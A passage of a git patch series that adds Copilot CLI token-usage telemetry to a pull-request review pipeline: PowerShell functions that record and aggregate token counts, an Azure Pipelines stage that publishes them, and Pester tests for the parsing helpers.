foreach ($property in $Value.PSObject.Properties) { + if ($property.MemberType -notin @('NoteProperty', 'Property', 'AliasProperty')) { + continue + } + + $childPath = if ($Path) { "$Path.$($property.Name)" } else { $property.Name } + foreach ($field in Get-CopilotUsageTokenFields -Value $property.Value -Path $childPath) { + [void]$fields.Add($field) + } + } + + return @($fields.ToArray()) +} + +function Get-TokenFieldSum { + param([object[]]$Fields) + + $items = @($Fields) + if ($items.Count -eq 0) { return $null } + + $sum = 0.0 + foreach ($item in $items) { + $sum += [double]$item.Value + } + + return [long][Math]::Round($sum) +} + +function Get-CopilotTokenMetrics { + param([object]$Usage) + + $tokenFields = @(Get-CopilotUsageTokenFields -Value $Usage) + $inputFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)(input|prompt)' -and + $_.Path -notmatch '(?i)(cache|cached)' -and + $_.Path -notmatch '(?i)total' + }) + $outputFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)(output|completion)' -and + $_.Path -notmatch '(?i)(cache|cached)' -and + $_.Path -notmatch '(?i)total' + }) + $cachedInputFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)(cache|cached)' -and + $_.Path -match '(?i)(input|prompt|read)' + }) + $explicitTotalFields = @($tokenFields | Where-Object { + $_.Path -match '(?i)total' -and + $_.Path -match '(?i)token' + }) + + $inputTokens = Get-TokenFieldSum -Fields $inputFields + $outputTokens = Get-TokenFieldSum -Fields $outputFields + $cachedInputTokens = Get-TokenFieldSum -Fields $cachedInputFields + $totalTokens = Get-TokenFieldSum -Fields $explicitTotalFields + if ($null -eq $totalTokens -and ($null -ne $inputTokens -or $null -ne $outputTokens)) { + $totalTokens = [long](($inputTokens ?? 0) + ($outputTokens ?? 
0)) + } + + return [ordered]@{ + inputTokens = $inputTokens + outputTokens = $outputTokens + cachedInputTokens = $cachedInputTokens + totalTokens = $totalTokens + rawTokenFields = @($tokenFields) + } +} + +function New-CopilotTokenUsageRecord { + param( + [int]$PRNumber, + [string]$Platform, + [string]$Phase, + [string]$StepName, + [string]$ModelName, + [datetimeoffset]$StartedAtUtc, + [datetimeoffset]$EndedAtUtc, + [long]$DurationMs, + [int]$TurnCount, + [int]$ToolCount, + [int]$FailedToolCount, + [object]$Usage, + [bool]$ResultEventSeen, + [int]$ExitCode + ) + + $apiDurationValue = Get-ObjectMemberValue -InputObject $Usage -Names @('totalApiDurationMs', 'total_api_duration_ms') + $apiDurationMs = if (Test-IsNumericValue $apiDurationValue) { [long]$apiDurationValue } else { $null } + + return [ordered]@{ + schemaVersion = 1 + generatedAtUtc = ([DateTimeOffset]::UtcNow).ToString('o') + prNumber = $PRNumber + platform = $Platform + pipeline = [ordered]@{ + buildId = $env:BUILD_BUILDID + buildNumber = $env:BUILD_BUILDNUMBER + definitionName = $env:BUILD_DEFINITIONNAME + stageName = $env:SYSTEM_STAGENAME + jobName = $env:SYSTEM_JOBNAME + jobDisplayName = $env:SYSTEM_JOBDISPLAYNAME + taskInstanceId = $env:SYSTEM_TASKINSTANCEID + } + scriptPhase = if ($Phase) { $Phase } else { 'All' } + copilotStep = $StepName + model = $ModelName + startedAtUtc = $StartedAtUtc.ToString('o') + endedAtUtc = $EndedAtUtc.ToString('o') + durationMs = $DurationMs + apiDurationMs = $apiDurationMs + resultEventSeen = $ResultEventSeen + exitCode = $ExitCode + turnCount = $TurnCount + toolCount = $ToolCount + failedToolCount = $FailedToolCount + normalizedTokens = Get-CopilotTokenMetrics -Usage $Usage + usage = $Usage + costEstimateAvailable = $false + costEstimateNote = 'Dollar cost not calculated; no trusted rate table configured.' 
+ } +} + +function Write-CopilotTokenUsageRecord { + param( + [string]$OutputDir, + [object]$Record + ) + + if ([string]::IsNullOrWhiteSpace($OutputDir) -or $null -eq $Record) { + return + } + + try { + New-Item -ItemType Directory -Path $OutputDir -Force | Out-Null + $stepName = [string]$Record.copilotStep + $safeStepName = ($stepName -replace '[^A-Za-z0-9._-]+', '-').Trim('-') + if ([string]::IsNullOrWhiteSpace($safeStepName)) { + $safeStepName = 'copilot-step' + } + + $timestamp = [DateTimeOffset]::UtcNow.ToString('yyyyMMddTHHmmssfffZ') + $fileName = "copilot-token-usage-$timestamp-$safeStepName-$([guid]::NewGuid().ToString('N')).json" + $path = Join-Path $OutputDir $fileName + $Record | ConvertTo-Json -Depth 50 | Set-Content -Path $path -Encoding UTF8 + Write-Host " Token usage record: $path" -ForegroundColor DarkGray + } catch { + Write-Host " WARNING: Failed to write Copilot token usage record: $_" -ForegroundColor Yellow + } +} + # ─── Helper: Invoke Copilot ────────────────────────────────────────────────── function Invoke-CopilotStep { param([string]$StepName, [string]$Prompt) @@ -599,12 +843,15 @@ function Invoke-CopilotStep { return 0 } + $startedAtUtc = [DateTimeOffset]::UtcNow $stopwatch = [System.Diagnostics.Stopwatch]::StartNew() $toolCount = 0 $turnCount = 0 $currentIntent = "" $modelName = "" $failedTools = @() + $resultEventSeen = $false + $resultUsage = $null # Tool icon mapping for common tools $toolIcons = @{ @@ -623,6 +870,9 @@ function Invoke-CopilotStep { # Model is overridable via $env:COPILOT_REVIEW_MODEL so contributors without internal-model access # can run this script (e.g., with 'claude-opus-4.6' or 'claude-sonnet-4.6'). 
$copilotModel = if ($env:COPILOT_REVIEW_MODEL) { $env:COPILOT_REVIEW_MODEL } else { 'gpt-5.5' } + if ([string]::IsNullOrWhiteSpace($modelName)) { + $modelName = $copilotModel + } & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object { $line = $_.ToString() try { @@ -717,7 +967,9 @@ function Invoke-CopilotStep { } 'result' { # Final stats — note: 'result' is a top-level event with no 'data' wrapper. + $resultEventSeen = $true $usage = $event.usage + $resultUsage = $usage if ($usage) { $elapsed = $stopwatch.Elapsed.ToString("mm\:ss") $apiMs = if ($usage.totalApiDurationMs) { [math]::Round($usage.totalApiDurationMs / 1000, 1) } else { "?" } @@ -750,6 +1002,24 @@ function Invoke-CopilotStep { } $exitCode = $LASTEXITCODE $stopwatch.Stop() + $endedAtUtc = [DateTimeOffset]::UtcNow + + $usageRecord = New-CopilotTokenUsageRecord ` + -PRNumber $PRNumber ` + -Platform $Platform ` + -Phase $Phase ` + -StepName $StepName ` + -ModelName $modelName ` + -StartedAtUtc $startedAtUtc ` + -EndedAtUtc $endedAtUtc ` + -DurationMs $stopwatch.ElapsedMilliseconds ` + -TurnCount $turnCount ` + -ToolCount $toolCount ` + -FailedToolCount (@($failedTools).Count) ` + -Usage $resultUsage ` + -ResultEventSeen $resultEventSeen ` + -ExitCode $exitCode + Write-CopilotTokenUsageRecord -OutputDir $TokenUsageOutputDir -Record $usageRecord if ($exitCode -eq 0) { Write-Host " ✅ $StepName completed" -ForegroundColor Green diff --git a/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 new file mode 100644 index 000000000000..6b3d8355a3e1 --- /dev/null +++ b/.github/scripts/shared/Aggregate-CopilotTokenUsage.ps1 @@ -0,0 +1,355 @@ +#!/usr/bin/env pwsh +<# +.SYNOPSIS + Aggregates Copilot CLI usage telemetry into publishable artifacts. 
+ +.DESCRIPTION + Reads raw telemetry records emitted by Review-PR.ps1 and writes JSON, + Markdown, CSV, and JSONL summaries. Missing input is treated as a valid + no-usage report so the publishing stage can still produce artifacts after + partial pipeline failures. +#> + +[CmdletBinding()] +param( + [Parameter(Mandatory = $true)] + [string]$InputRoot, + + [Parameter(Mandatory = $true)] + [string]$OutputDir, + + [Parameter(Mandatory = $false)] + [string]$PRNumber, + + [Parameter(Mandatory = $false)] + [string[]]$ExpectedStages = @( + 'ReviewPR', + 'RunDeepUITests', + 'UpdateAISummaryComment', + 'AnalyzeCopilotTokenUsage' + ) +) + +$ErrorActionPreference = 'Stop' + +function Get-ObjectMemberValue { + param( + [object]$InputObject, + [string[]]$Names + ) + + if ($null -eq $InputObject) { return $null } + + foreach ($name in $Names) { + if ($InputObject -is [System.Collections.IDictionary] -and $InputObject.Contains($name)) { + return $InputObject[$name] + } + + $property = $InputObject.PSObject.Properties[$name] + if ($property) { + return $property.Value + } + } + + return $null +} + +function Get-NestedValue { + param( + [object]$InputObject, + [string[]]$Path + ) + + $current = $InputObject + foreach ($segment in $Path) { + $current = Get-ObjectMemberValue -InputObject $current -Names @($segment) + if ($null -eq $current) { return $null } + } + + return $current +} + +function Get-NumericOrNull { + param([object]$Value) + + if ($null -eq $Value) { return $null } + if ($Value -is [byte] -or + $Value -is [sbyte] -or + $Value -is [int16] -or + $Value -is [uint16] -or + $Value -is [int] -or + $Value -is [uint32] -or + $Value -is [long] -or + $Value -is [uint64] -or + $Value -is [float] -or + $Value -is [double] -or + $Value -is [decimal]) { + return [double]$Value + } + + $parsed = 0.0 + if ([double]::TryParse([string]$Value, [ref]$parsed)) { + return $parsed + } + + return $null +} + +function Get-NullableSum { + param([object[]]$Values) + + $hasValue = $false + $sum 
= 0.0 + foreach ($value in @($Values)) { + $numeric = Get-NumericOrNull -Value $value + if ($null -ne $numeric) { + $hasValue = $true + $sum += $numeric + } + } + + if (-not $hasValue) { return $null } + return [long][Math]::Round($sum) +} + +function Get-RecordStageName { + param([object]$Record) + + $stageName = [string](Get-NestedValue -InputObject $Record -Path @('pipeline', 'stageName')) + if ([string]::IsNullOrWhiteSpace($stageName)) { + return 'ReviewPR' + } + + return $stageName +} + +function Get-RecordTokenValue { + param( + [object]$Record, + [string]$Name + ) + + return Get-NestedValue -InputObject $Record -Path @('normalizedTokens', $Name) +} + +function Read-CopilotTokenUsageRecords { + param([string]$Root) + + $records = New-Object System.Collections.ArrayList + if ([string]::IsNullOrWhiteSpace($Root) -or -not (Test-Path $Root)) { + return @() + } + + $files = Get-ChildItem -Path $Root -Recurse -File -Filter 'copilot-token-usage-*.json' -ErrorAction SilentlyContinue | + Sort-Object FullName + + foreach ($file in @($files)) { + try { + $record = Get-Content -Path $file.FullName -Raw -Encoding UTF8 | ConvertFrom-Json -ErrorAction Stop + $record | Add-Member -NotePropertyName sourceFile -NotePropertyValue $file.FullName -Force + [void]$records.Add($record) + } catch { + Write-Warning "Skipping malformed token usage record '$($file.FullName)': $_" + } + } + + return @($records.ToArray()) +} + +function New-StageSummaryRows { + param( + [object[]]$Records, + [string[]]$ExpectedStages + ) + + $stageNames = New-Object System.Collections.ArrayList + foreach ($stage in @($ExpectedStages)) { + if (-not [string]::IsNullOrWhiteSpace($stage) -and -not $stageNames.Contains($stage)) { + [void]$stageNames.Add($stage) + } + } + + foreach ($record in @($Records)) { + $stage = Get-RecordStageName -Record $record + if (-not $stageNames.Contains($stage)) { + [void]$stageNames.Add($stage) + } + } + + $rows = New-Object System.Collections.ArrayList + foreach ($stage in 
@($stageNames.ToArray())) { + $stageRecords = @($Records | Where-Object { (Get-RecordStageName -Record $_) -eq $stage }) + $hasRecords = $stageRecords.Count -gt 0 + [void]$rows.Add([pscustomobject][ordered]@{ + stageName = $stage + invocationCount = $stageRecords.Count + inputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) } else { 0 } + outputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) } else { 0 } + cachedInputTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) } else { 0 } + totalTokens = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) } else { 0 } + durationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.durationMs }) } else { 0 } + apiDurationMs = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.apiDurationMs }) } else { 0 } + turnCount = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.turnCount }) } else { 0 } + toolCount = if ($hasRecords) { Get-NullableSum -Values @($stageRecords | ForEach-Object { $_.toolCount }) } else { 0 } + note = if ($hasRecords) { '' } else { 'No Copilot invocation observed in this stage.' 
} + }) + } + + return @($rows.ToArray()) +} + +function New-StepSummaryRows { + param([object[]]$Records) + + $groups = @{} + foreach ($record in @($Records)) { + $stage = Get-RecordStageName -Record $record + $step = [string]$record.copilotStep + $model = [string]$record.model + $key = "$stage|$step|$model" + if (-not $groups.ContainsKey($key)) { + $groups[$key] = New-Object System.Collections.ArrayList + } + [void]$groups[$key].Add($record) + } + + $rows = New-Object System.Collections.ArrayList + foreach ($key in ($groups.Keys | Sort-Object)) { + $items = @($groups[$key].ToArray()) + $first = $items[0] + [void]$rows.Add([pscustomobject][ordered]@{ + stageName = Get-RecordStageName -Record $first + scriptPhase = [string]$first.scriptPhase + copilotStep = [string]$first.copilotStep + model = [string]$first.model + invocationCount = $items.Count + inputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) + outputTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) + totalTokens = Get-NullableSum -Values @($items | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + durationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.durationMs }) + apiDurationMs = Get-NullableSum -Values @($items | ForEach-Object { $_.apiDurationMs }) + turnCount = Get-NullableSum -Values @($items | ForEach-Object { $_.turnCount }) + toolCount = Get-NullableSum -Values @($items | ForEach-Object { $_.toolCount }) + }) + } + + return @($rows.ToArray()) +} + +function New-CopilotTokenUsageSummary { + param( + [object[]]$Records, + [string[]]$ExpectedStages, + [string]$PRNumber + ) + + $stageRows = @(New-StageSummaryRows -Records $Records -ExpectedStages $ExpectedStages) + $stepRows = @(New-StepSummaryRows -Records $Records) + + return [ordered]@{ + schemaVersion = 1 + generatedAtUtc = ([DateTimeOffset]::UtcNow).ToString('o') + prNumber = 
$PRNumber + costEstimateAvailable = $false + costEstimateNote = 'Dollar cost not calculated; no trusted rate table configured.' + recordCount = @($Records).Count + expectedStages = @($ExpectedStages) + totals = [ordered]@{ + invocationCount = @($Records).Count + inputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'inputTokens' }) + outputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'outputTokens' }) + cachedInputTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'cachedInputTokens' }) + totalTokens = Get-NullableSum -Values @($Records | ForEach-Object { Get-RecordTokenValue -Record $_ -Name 'totalTokens' }) + durationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.durationMs }) + apiDurationMs = Get-NullableSum -Values @($Records | ForEach-Object { $_.apiDurationMs }) + turnCount = Get-NullableSum -Values @($Records | ForEach-Object { $_.turnCount }) + toolCount = Get-NullableSum -Values @($Records | ForEach-Object { $_.toolCount }) + } + stages = @($stageRows) + steps = @($stepRows) + } +} + +function Format-UsageValue { + param([object]$Value) + + if ($null -eq $Value -or [string]::IsNullOrWhiteSpace([string]$Value)) { + return 'n/a' + } + + return [string]$Value +} + +function New-CopilotTokenUsageMarkdown { + param([object]$Summary) + + $lines = New-Object System.Collections.ArrayList + [void]$lines.Add('# Copilot token usage') + [void]$lines.Add('') + [void]$lines.Add("- PR: $(if ($Summary.prNumber) { $Summary.prNumber } else { 'n/a' })") + [void]$lines.Add("- Records: $($Summary.recordCount)") + [void]$lines.Add("- Cost estimate: not calculated (no trusted rate table configured)") + [void]$lines.Add('') + [void]$lines.Add('## Totals') + [void]$lines.Add('') + [void]$lines.Add('| Metric | Value |') + [void]$lines.Add('|---|---:|') + [void]$lines.Add("| Invocations | 
$($Summary.totals.invocationCount) |") + [void]$lines.Add("| Input tokens | $(Format-UsageValue $Summary.totals.inputTokens) |") + [void]$lines.Add("| Output tokens | $(Format-UsageValue $Summary.totals.outputTokens) |") + [void]$lines.Add("| Cached input tokens | $(Format-UsageValue $Summary.totals.cachedInputTokens) |") + [void]$lines.Add("| Total tokens | $(Format-UsageValue $Summary.totals.totalTokens) |") + [void]$lines.Add("| Elapsed ms | $(Format-UsageValue $Summary.totals.durationMs) |") + [void]$lines.Add("| API duration ms | $(Format-UsageValue $Summary.totals.apiDurationMs) |") + [void]$lines.Add("| Turns | $(Format-UsageValue $Summary.totals.turnCount) |") + [void]$lines.Add("| Tools | $(Format-UsageValue $Summary.totals.toolCount) |") + [void]$lines.Add('') + [void]$lines.Add('## By stage') + [void]$lines.Add('') + [void]$lines.Add('| Stage | Invocations | Input | Output | Cached input | Total | Elapsed ms | API ms | Note |') + [void]$lines.Add('|---|---:|---:|---:|---:|---:|---:|---:|---|') + foreach ($stage in @($Summary.stages)) { + [void]$lines.Add("| $($stage.stageName) | $($stage.invocationCount) | $(Format-UsageValue $stage.inputTokens) | $(Format-UsageValue $stage.outputTokens) | $(Format-UsageValue $stage.cachedInputTokens) | $(Format-UsageValue $stage.totalTokens) | $(Format-UsageValue $stage.durationMs) | $(Format-UsageValue $stage.apiDurationMs) | $($stage.note) |") + } + [void]$lines.Add('') + [void]$lines.Add('## By Copilot step') + [void]$lines.Add('') + if (@($Summary.steps).Count -eq 0) { + [void]$lines.Add('No Copilot invocations were recorded.') + } else { + [void]$lines.Add('| Stage | Phase | Step | Model | Invocations | Input | Output | Total | Elapsed ms | API ms |') + [void]$lines.Add('|---|---|---|---|---:|---:|---:|---:|---:|---:|') + foreach ($step in @($Summary.steps)) { + [void]$lines.Add("| $($step.stageName) | $($step.scriptPhase) | $($step.copilotStep) | $($step.model) | $($step.invocationCount) | $(Format-UsageValue 
$step.inputTokens) | $(Format-UsageValue $step.outputTokens) | $(Format-UsageValue $step.totalTokens) | $(Format-UsageValue $step.durationMs) | $(Format-UsageValue $step.apiDurationMs) |") + } + } + + return ($lines -join [Environment]::NewLine) + [Environment]::NewLine +} + +New-Item -ItemType Directory -Path $OutputDir -Force | Out-Null + +$records = @(Read-CopilotTokenUsageRecords -Root $InputRoot) +$summary = New-CopilotTokenUsageSummary -Records $records -ExpectedStages $ExpectedStages -PRNumber $PRNumber + +$rawJsonlPath = Join-Path $OutputDir 'token-usage-raw.jsonl' +if ($records.Count -gt 0) { + $records | ForEach-Object { $_ | ConvertTo-Json -Depth 50 -Compress } | + Set-Content -Path $rawJsonlPath -Encoding UTF8 +} else { + '' | Set-Content -Path $rawJsonlPath -Encoding UTF8 +} + +$summary | ConvertTo-Json -Depth 50 | Set-Content -Path (Join-Path $OutputDir 'token-usage-summary.json') -Encoding UTF8 +New-CopilotTokenUsageMarkdown -Summary $summary | Set-Content -Path (Join-Path $OutputDir 'token-usage-summary.md') -Encoding UTF8 + +$csvPath = Join-Path $OutputDir 'token-usage-by-step.csv' +if (@($summary.steps).Count -gt 0) { + @($summary.steps) | Export-Csv -Path $csvPath -NoTypeInformation -Encoding UTF8 +} else { + 'stageName,scriptPhase,copilotStep,model,invocationCount,inputTokens,outputTokens,totalTokens,durationMs,apiDurationMs,turnCount,toolCount' | + Set-Content -Path $csvPath -Encoding UTF8 +} + +Write-Host "Copilot token usage records: $($summary.recordCount)" +Write-Host "Copilot token usage artifact directory: $OutputDir" diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 3c10c99fac72..0745323e92e1 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -614,6 +614,7 @@ stages: # Create artifacts directory mkdir -p $(Build.ArtifactStagingDirectory)/copilot-logs + mkdir -p $(Build.ArtifactStagingDirectory)/copilot-token-usage/raw # Copy trusted scripts from the checked-out commit so later 
tasks # (which may be on a merged/modified worktree) use the same .github/ @@ -633,6 +634,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase Setup \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" SETUP_EXIT=$? set -e @@ -663,6 +665,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase Gate \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" GATE_EXIT=$? set -e @@ -694,6 +697,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase CopilotReview \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" REVIEW_EXIT=$? set -e @@ -724,6 +728,7 @@ stages: -Platform "${{ parameters.Platform }}" \ -Phase Post \ -TrustedScriptsDir "$TRUSTED" \ + -TokenUsageOutputDir "$(Build.ArtifactStagingDirectory)/copilot-token-usage/raw" \ -LogFile "$(Build.ArtifactStagingDirectory)/copilot-logs/copilot_review_output.md" POST_EXIT=$? set -e @@ -761,6 +766,13 @@ stages: Copy-Item -Path ".github/agent-pr-session" -Destination $logsDir -Recurse -Force -ErrorAction SilentlyContinue } + # Copilot token usage raw records + $tokenUsageDir = "$(Build.ArtifactStagingDirectory)/copilot-token-usage" + if (Test-Path $tokenUsageDir) { + Write-Host "Copying copilot-token-usage..." + Copy-Item -Path $tokenUsageDir -Destination (Join-Path $logsDir "copilot-token-usage") -Recurse -Force -ErrorAction SilentlyContinue + } + # Review_Feedback files Get-ChildItem -Path . 
-Filter "Review_Feedback_*.md" -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item $_.FullName $logsDir -ErrorAction SilentlyContinue } @@ -1698,3 +1710,56 @@ stages: displayName: 'Post AI summary review' env: GH_TOKEN: $(GH_COMMENT_TOKEN) + + - stage: AnalyzeCopilotTokenUsage + displayName: 'Analyze Copilot token usage' + dependsOn: + - ReviewPR + - RunDeepUITests + - UpdateAISummaryComment + condition: always() + jobs: + - job: AnalyzeTokenUsage + displayName: 'Publish Copilot token usage artifact' + pool: + name: Azure Pipelines + vmImage: ubuntu-22.04 + timeoutInMinutes: 10 + steps: + - checkout: self + persistCredentials: false + + - task: DownloadPipelineArtifact@2 + displayName: 'Download CopilotLogs' + inputs: + buildType: 'current' + artifactName: 'CopilotLogs' + targetPath: '$(Pipeline.Workspace)/CopilotLogs' + continueOnError: true + + - pwsh: | + $ErrorActionPreference = 'Stop' + $inputRoot = "$(Pipeline.Workspace)/CopilotLogs" + $outputDir = "$(Build.ArtifactStagingDirectory)/copilot-token-usage" + $script = ".github/scripts/shared/Aggregate-CopilotTokenUsage.ps1" + if (-not (Test-Path $script)) { throw "$script missing" } + + & $script ` + -InputRoot $inputRoot ` + -OutputDir $outputDir ` + -PRNumber "${{ parameters.PRNumber }}" ` + -ExpectedStages @( + 'ReviewPR', + 'RunDeepUITests', + 'UpdateAISummaryComment', + 'AnalyzeCopilotTokenUsage' + ) + displayName: 'Aggregate Copilot token usage' + + - task: PublishPipelineArtifact@1 + displayName: 'Publish CopilotTokenUsage' + inputs: + targetPath: '$(Build.ArtifactStagingDirectory)/copilot-token-usage' + artifact: 'CopilotTokenUsage' + publishLocation: 'pipeline' + condition: always() From 8559242316f99021a491b91fb9af314181153c44 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 5 Jun 2026 15:31:26 +0200 Subject: [PATCH 33/34] Capture Copilot OTel token metrics Enable the Copilot OTel file exporter per review step and merge exported token 
metrics into the existing CopilotTokenUsage artifact summaries. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../Aggregate-CopilotTokenUsage.Tests.ps1 | 8 + .github/scripts/Review-PR.Tests.ps1 | 88 ++++ .github/scripts/Review-PR.ps1 | 466 ++++++++++++++---- .../shared/Aggregate-CopilotTokenUsage.ps1 | 41 +- 4 files changed, 488 insertions(+), 115 deletions(-) diff --git a/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 index f4b7138f36bb..9baf64b83113 100644 --- a/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 +++ b/.github/scripts/Aggregate-CopilotTokenUsage.Tests.ps1 @@ -32,6 +32,11 @@ Describe 'Aggregate-CopilotTokenUsage.ps1' { apiDurationMs = 2000 turnCount = 2 toolCount = 3 + cliUsage = [ordered]@{ + aicUsed = 7.5 + contextWindow = 1100000 + contextWindowRaw = '1.1M' + } normalizedTokens = [ordered]@{ inputTokens = 100 outputTokens = 40 @@ -56,14 +61,17 @@ Describe 'Aggregate-CopilotTokenUsage.ps1' { $summary.totals.inputTokens | Should -Be 100 $summary.totals.outputTokens | Should -Be 40 $summary.totals.totalTokens | Should -Be 140 + $summary.totals.aicUsed | Should -Be 7.5 $reviewStage = $summary.stages | Where-Object { $_.stageName -eq 'ReviewPR' } $reviewStage.invocationCount | Should -Be 1 $reviewStage.totalTokens | Should -Be 140 + $reviewStage.aicUsed | Should -Be 7.5 $deepStage = $summary.stages | Where-Object { $_.stageName -eq 'RunDeepUITests' } $deepStage.invocationCount | Should -Be 0 $deepStage.totalTokens | Should -Be 0 + $deepStage.aicUsed | Should -Be 0 $deepStage.note | Should -Be 'No Copilot invocation observed in this stage.' 
} diff --git a/.github/scripts/Review-PR.Tests.ps1 b/.github/scripts/Review-PR.Tests.ps1 index 934724a2e8bf..362e3e6fa788 100644 --- a/.github/scripts/Review-PR.Tests.ps1 +++ b/.github/scripts/Review-PR.Tests.ps1 @@ -47,6 +47,9 @@ BeforeAll { Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotUsageTokenFields') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-TokenFieldSum') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotTokenMetrics') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Convert-CopilotCompactNumber') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotCliUsageLineData') + Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'Get-CopilotOtelTokenMetrics') Invoke-Expression (Get-FunctionBody -ScriptText $content -FunctionName 'New-CopilotTokenUsageRecord') } @@ -71,6 +74,44 @@ Describe 'Copilot token usage helpers' { @($metrics.rawTokenFields | Where-Object { $_.Path -eq 'nested.cachedInputTokens' }).Count | Should -Be 1 } + It 'parses Copilot CLI AIC and context footer lines' { + $aicLine = Get-CopilotCliUsageLineData -Line 'Session: 1030 AIC used' + $contextLine = Get-CopilotCliUsageLineData -Line 'GPT-5.5 • 1.1M context' + + $aicLine.aicUsed | Should -Be 1030 + $contextLine.model | Should -Be 'GPT-5.5' + $contextLine.contextWindowRaw | Should -Be '1.1M' + $contextLine.contextWindow | Should -Be 1100000 + } + + It 'reads token counts from Copilot OTel spans' { + $otelPath = Join-Path ([System.IO.Path]::GetTempPath()) "copilot-otel-$([guid]::NewGuid()).jsonl" + try { + [ordered]@{ + type = 'span' + attributes = [ordered]@{ + 'gen_ai.usage.input_tokens' = 1000 + 'gen_ai.usage.output_tokens' = 200 + 'gen_ai.usage.cache_read.input_tokens' = 800 + 'gen_ai.usage.reasoning.output_tokens' = 50 + 'github.copilot.cost' = 7.5 + } + } | ConvertTo-Json -Depth 10 -Compress | Set-Content $otelPath 
-Encoding UTF8 + + $metrics = Get-CopilotOtelTokenMetrics -Path $otelPath + + $metrics.available | Should -Be $true + $metrics.inputTokens | Should -Be 1000 + $metrics.outputTokens | Should -Be 200 + $metrics.cachedInputTokens | Should -Be 800 + $metrics.reasoningOutputTokens | Should -Be 50 + $metrics.totalTokens | Should -Be 1200 + $metrics.copilotCost | Should -Be 7.5 + } finally { + Remove-Item $otelPath -Force -ErrorAction SilentlyContinue + } + } + It 'builds a telemetry record with raw usage and no hardcoded cost estimate' { $usage = [pscustomobject]@{ prompt_tokens = 25 @@ -92,6 +133,10 @@ Describe 'Copilot token usage helpers' { -ToolCount 3 ` -FailedToolCount 1 ` -Usage $usage ` + -OtelMetrics $null ` + -AicUsed 1030 ` + -ContextWindow 1100000 ` + -ContextWindowRaw '1.1M' ` -ResultEventSeen $true ` -ExitCode 0 @@ -102,9 +147,52 @@ Describe 'Copilot token usage helpers' { $record.normalizedTokens.inputTokens | Should -Be 25 $record.normalizedTokens.outputTokens | Should -Be 15 $record.normalizedTokens.totalTokens | Should -Be 45 + $record.cliUsage.aicUsed | Should -Be 1030 + $record.cliUsage.contextWindow | Should -Be 1100000 + $record.cliUsage.contextWindowRaw | Should -Be '1.1M' $record.usage.total_tokens | Should -Be 45 $record.costEstimateAvailable | Should -Be $false } + + It 'uses OTel token metrics when result usage has no token fields' { + $otelMetrics = [ordered]@{ + inputTokens = 500 + outputTokens = 75 + cachedInputTokens = 400 + reasoningOutputTokens = 25 + totalTokens = 575 + copilotCost = 7.5 + file = '/tmp/copilot-otel.jsonl' + } + + $record = New-CopilotTokenUsageRecord ` + -PRNumber 35677 ` + -Platform 'android' ` + -Phase 'CopilotReview' ` + -StepName 'STEP 5a: TRY-FIX' ` + -ModelName 'gpt-5.5' ` + -StartedAtUtc ([DateTimeOffset]::Parse('2026-06-05T10:00:00Z')) ` + -EndedAtUtc ([DateTimeOffset]::Parse('2026-06-05T10:00:05Z')) ` + -DurationMs 5000 ` + -TurnCount 2 ` + 